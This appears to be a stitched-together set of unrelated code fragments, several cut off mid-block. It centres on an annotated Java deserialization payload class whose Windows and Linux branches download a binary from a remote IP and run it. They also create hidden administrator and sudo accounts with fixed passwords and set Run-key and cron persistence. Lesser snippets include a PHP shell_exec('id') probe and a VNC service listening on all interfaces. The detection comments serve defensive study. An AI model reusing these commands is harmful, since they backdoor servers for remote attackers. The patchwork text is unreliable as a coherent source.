// Analysis notes: Windows branch of the sample. This is a fragment: the enclosing method and the
// download() helper are not shown, and the catch block at the end is cut off.
//
// Step 1: a remote file is fetched and stored in the Windows temp directory under the name of a
// legitimate system binary. The genuine dllhost.exe lives in System32, so an image with that name
// running from c:\windows\temp is a masquerading indicator. The destination literal ends in ';';
// whether download() strips it cannot be determined from this fragment.
this.download("http://148.251.71.182/symantec.tmp", "c:\\windows\\temp\\dllhost.exe;");
// Step 2: start of the PowerShell script; it launches the dropped file.
String win_cmd = "Start-Process c:\\windows\\temp\\dllhost.exe;";
// Step 3: local account changes. The script creates and enables "DefaultAccount", sets its password,
// adds it to Administrators and Remote Desktop Users, and marks the password as never expiring.
// Windows 10 / Server 2016 and later ship a built-in, normally disabled account with this name, so
// an enabled DefaultAccount with group memberships is worth alerting on. Relevant Security log
// events: 4720 (account created), 4722 (account enabled), 4724 (password reset), 4732 (added to a
// local group), 4738 (account changed).
win_cmd += "net user /add DefaultAccount P@ssw0rd123412; net user DefaultAccount /active:yes; net user DefaultAccount P@ssw0rd12341234; net localgroup Administrators /add DefaultAccount; net localgroup 'Remote Desktop Users' /add DefaultAccount; Set-LocalUser -Name DefaultAccount -PasswordNeverExpires 1;";
// Step 4: persistence. A value named 'DllHost' under the machine-wide Run key points at the dropped
// file, so it starts at every logon. Registry auditing (e.g. Sysmon event 13) on this key catches it.
win_cmd += "New-Itemproperty -path 'HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -Name 'DllHost' -value 'c:\\windows\\temp\\dllhost.exe' -PropertyType 'String' -Force;";
// The whole script is passed to powershell as one script block. A Java process (application server,
// JVM service) spawning powershell is itself a strong process-lineage detection signal.
final String[] arrayOfString = { "powershell", "-c Invoke-Command", "{" + win_cmd + "}" };
try {
Runtime.getRuntime().exec(arrayOfString);
}
catch (IOException iOException) {
// A failure to start the process is only printed; nothing else visible here reacts to it.
iOException.printStackTrace();
// Analysis notes: Linux branch of the sample. This is a fragment: the enclosing method and the
// download() helper are not shown.
//
// Step 1: a remote file is fetched and stored as /tmp/lock. Executables appearing in and running
// from /tmp are a common hunting lead; mounting /tmp noexec raises the bar where that is feasible.
this.download("http://148.251.71.182/symantec_linux.x86", "/tmp/lock");
// Step 2: one shell line that (a) marks the file executable, (b) adds a user "master" with primary
// group sudo, a home directory, a bash shell and a pre-hashed password (openssl passwd -1 yields an
// MD5-crypt hash), and (c) starts the file in the background, detached from the parent via nohup.
// Detection: audit writes to /etc/passwd, /etc/shadow and /etc/group, and review sudo group members.
final String linux_cmd = "chmod +x /tmp/lock ; useradd -g sudo -m -s /bin/bash -p $(echo P@ssw0rd1234 | openssl passwd -1 -stdin) master; nohup /tmp/lock &";
final String[] arrayOfString = { "/bin/sh", "-c", linux_cmd };
try {
// A Java process spawning /bin/sh is a process-lineage signal worth alerting on for server JVMs.
Runtime.getRuntime().exec(arrayOfString);
// Step 3: persistence. An "@reboot /tmp/lock" entry is appended to the crontab of the account the
// JVM runs as. Monitor crontab changes and check for @reboot entries that point into /tmp.
Runtime.getRuntime().exec(new String[] { "/bin/sh", "-c", "(crontab -l && echo \"@reboot /tmp/lock\") | crontab -" });
} catch (IOException iOException) {
// A failure to start either process is only printed; nothing else visible here reacts to it.
iOException.printStackTrace();
}
// Analysis notes: outline of the sample's payload class; the "..." lines are elisions made by the
// page author, not Java. The class extends AbstractTranslet (the XSLTC translet base class; its
// import is not shown). Classes of this shape are commonly seen as the bytecode loaded by
// XSLT-template deserialization gadget chains, where instantiating the class is enough to run its
// constructor. Mitigation is on the receiving side: keep the deserializing library patched and
// restrict which classes may be deserialized (allow-lists / ObjectInputFilter).
public class RCE extends AbstractTranslet
{
// All of the logic sits in the constructor, so it executes as soon as an instance is created.
public RCE() {
// File.separator is "/" on Unix-like systems; this selects the OS-specific branch.
if (File.separator.equals("/")) {
// presumably the Linux commands shown elsewhere on this page (confirm against the full sample)
...
} else {
// presumably the Windows commands shown elsewhere on this page (confirm against the full sample)
...
}
}
}
# Report the disconnected network adapters of powered-on VMs.
# For every VM whose PowerState is "PoweredOn", each network adapter is listed together with the VM
# name; only adapters whose ConnectionState.Connected is $false are kept, and the result
# (VMName, Name, NetworkName, ConnectionState) is written to ./nic_report.csv.
# -UseCulture makes Export-Csv use the current culture's list separator as the delimiter.
# NOTE(review): Get-VM / Get-NetworkAdapter look like VMware PowerCLI cmdlets, which presumably need
# an existing server connection before this runs. Confirm.
&{Get-VM | ?{$_.PowerState -eq "PoweredOn"} | %{
$strVMName = $_.Name; Get-NetworkAdapter -VM $_ |
select @{n="VMName"; e={$strVMName}},Name,NetworkName,ConnectionState} |
?{$_.ConnectionState.Connected -eq $false}} |
Export-Csv ./nic_report.csv -NoTypeInformation -UseCulture
# systemd template unit for a per-display VNC server (%i = instance name, used as the display
# number; %H = host name). The listing is cut off after ExecStart.
[Unit]
Description=Remote desktop service (VNC)
After=syslog.target network.target
[Service]
Type=simple
User=kali
PIDFile=/home/kali/.vnc/%H:%i.pid
# Kill any stale server on this display first; "|| :" keeps the step from failing when none runs.
ExecStartPre=/bin/sh -c '/usr/bin/vncserver -kill :%i > /dev/null 2>&1 || :'
# NOTE(review): "-localhost no" makes the server accept connections on every network interface, and
# "-alwaysshared" lets several clients attach to the same session. Unless the VNC port is firewalled
# and a strong VNC password or TLS security type is configured, prefer "-localhost yes" and reach the
# display through an SSH tunnel.
ExecStart=/usr/bin/vncserver -localhost no -alwaysshared :%i
set outputText to ""
set outputApplication to ""
set listOfProcesses to {}
# Get the text to type via the action script
set outputText to the text returned of (display dialog "Text to Type:" default answer "")
# Quit if nothing was input
if outputText is "" then
error number -128
#!/bin/bash
# Reports whether a TCP connection to <ip>:<port> succeeds within 0.8 seconds
# (nc -z only tests the connection and sends no data).
# Usage: ./reachable_test.sh <ip> <port>
# EX:
# cat ips.txt | while read ip; do ./checkScript.sh $ip <interesting_port> | tee -a scan.txt; done
# NOTE(review): the example calls the script checkScript.sh while the usage line says
# reachable_test.sh; presumably the same script. Use whichever name the file really has.
# NOTE(review): $1 and $2 are expanded unquoted below; quote them ("$1" "$2") when the values
# come from a file, so a malformed line cannot be split into extra nc arguments.
if timeout 0.8 nc -z $1 $2 2>/dev/null; then
echo "$1 reachable"
else
echo "$1 not reachable"
import os
from paramiko import SSHClient, AutoAddPolicy, RSAKey
from paramiko.auth_handler import AuthenticationException, SSHException
from pathlib import Path
class SSHer():
def __init__(self, remote_host, user, key_path):
self.remote_host = remote_host
self.ssh_key_path = key_path
#!/usr/local/bin/python3
import os, sys
from pathlib import Path
def parseDirectories(rootdir):
for subdir, dirs, files in os.walk(rootdir):
for file in files:
if ('.DS_Store' in file):
continue
<?php
// Runs the fixed command "id" through the system shell and prints its output, i.e. the identity
// the web server's PHP process runs as. A file like this under a web root is a common sign that
// someone tested for command execution; listing shell_exec and related functions in
// disable_functions in php.ini stops it from working.
echo shell_exec("id") ?>